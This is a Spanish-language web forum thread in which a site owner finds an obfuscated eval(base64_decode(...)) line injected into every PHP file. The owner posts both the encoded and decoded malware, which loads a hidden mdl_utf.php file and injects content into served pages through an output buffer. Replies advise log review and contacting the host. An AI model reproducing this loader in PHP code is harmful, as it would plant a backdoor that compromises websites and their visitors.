Codigo enciptado con base64_decode aparecio en todos mis archivos php!!

Hola gente, necesito ayuda urgente.
Tengo un sitio web programado en php(5) y ayer cuado entre mediante ftp al sitio, vi que TODOS los archivos php tenian fecha de modificacion del 2/9/2009. Pero yo no actualice TODOS los archivos ese dia , si no unos cuantos. Cuando me baje los archivos para revisarlos, encontre con desagradable sorpesa que a todos se les habia incluido el siguiente codigo en la primera linea:


<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl 9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXsk R0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG 9tZTMvaWVtYXRlcmkvcHVibGljX2h0bWwvbWQvbGliL2VkaXRv ci90aW55bWNlL2pzY3JpcHRzL3RpbnlfbWNlL3RoZW1lcy9hZH ZhbmNlZC9kb2NzL2VuL2ltYWdlcy9tZGxfdXRmLnBocCcpKXtp bmNsdWRlX29uY2UoJy9ob21lMy9pZW1hdGVyaS9wdWJsaWNfaH RtbC9tZC9saWIvZWRpdG9yL3RpbnltY2UvanNjcmlwdHMvdGlu eV9tY2UvdGhlbWVzL2FkdmFuY2VkL2RvY3MvZW4vaW1hZ2VzL2 1kbF91dGYucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwn KSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bm N0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pk ZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MT A7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigk ZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpey RoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXsk aD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaC s9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1 PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbi BkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBu b25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy 9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgn LyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO3 1lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29i aCcpO319fQ==')); ?>

mediante un echo base64_decode..... pude ver el codigo que se genera, y no estoy seguro de q hace (el sitio sigue funcionando), pero vi que menciona un archivo: mdl_utf.php que en algun lado vi q no era bueno.

POrfa si alguien sabe que es esto, COMO sucedio, y cual es el riesgo, se los agradeceria mucho...a mi me parece que la informacion enviada esta siendo espiada o algo asi????? como medida preventiva, cambiamos los permisos a 755 y REGISTER_GLOBALS en off... pero no se si esto prevendra algo.

PD, dejo el codigo desencriptado :

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home3/iemateri/public_html/md/lib/editor/tinymce/jscripts/tiny_mce/themes/advanced/docs/en/images/mdl_utf.php')){include_once('/home3/iemateri/public_html/md/lib/editor/tinymce/jscripts/tiny_mce/themes/advanced/docs/en/images/mdl_utf.php');if(function_exists('gml')&&!function _exists('dgobh')){if(!function_exists('gzdecode')) {function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if( $f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if( $f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;} $u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;} return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}

Gracias, seguire Luchando

Si todos los archivos fueron modificados, puede que el problema sea un virus, contacta con tu hosting y que verifiquen con algun antivirus para que vean si tienen un problema.

Saludos

Luchando:

¿Ese sitio es hecho tuyo o es una de esas aplicaciones conocidas?

Evidentemente te han HACKEADO tu sitio sin lugar a dudas.

Fijate, que cuando los sitios son hackeados asi de facil no solo es un problema para ti y tu aplicacion pero tambien todo el sistema de tu hosting esta de alguna manera en riezgo.
Generalmente, desde tu hosting o el que maneja tu sitio se determina la fecha de modificacion y se analiza los logs de acceso y errores del servidor exactamente en esa misma fecha (Dia, hora, minuto y segundo)
para determinar el punto exacto de entrada y como ingresaron; esto es medular por cuanto lo pueden hacer multiples veces y cada vez puede ser mas y mas destructivo.
Esta informacion te permite saber la IP que uso el atacante para bloquearlo definitivamente, etc, etc.
Asimismo, como nos dice GatorV, bien puede ser que via un upload u otro metodo te han introducido algun archivo (Virus) que estara haciendo daño continuamente; por ello lo anterior es necesario determinar y analizar.
Siempre es recomendable colocar en Internet aplicaciones profesionales para evitar ese riezgo.
La verdad es que mas de 12000 sitios web son hackeados cada semana.

Saludos
Franco

El sitio lo desarrolle yo, y lamentablemente no soy yo quien tiene contacto directamentecon el hosting, si no a traves de un administrador.

Solicitare un escaneo y revisare los logs. Yo miso revise un archivo de los, pero solo muestra algunos errores en esa fecha... supongo q el administrador tendrà acceso a mas informacion, sobre quien pudo acceder al sitio.

Lo q me preocupa es que el "virus" o lo q sea lo tenga yo en mi maquina y se autoejecute al subirlo al host, pero no encontre nada en mi maquina.

revisare estos puntos y a ver q me encuentro.

PD. NO saben nada de algun metodo de hackeo que de laguna manera automática (porq obviamente fue un script o algo asi) modifique todos los archivos de un tipo?? (en este caso PHP)???

Gracias

Luchando:

Este post te podria dar idea de como se ingresa.
Recuerda, de ninguna manera este post es exhaustivo ni completo
pero si ofrece una vision mas clara de los riezgos.

http://www.forosdelweb.com/f18/ayuda...eguras-670002/

Saludos
Y espero te ayude
Franco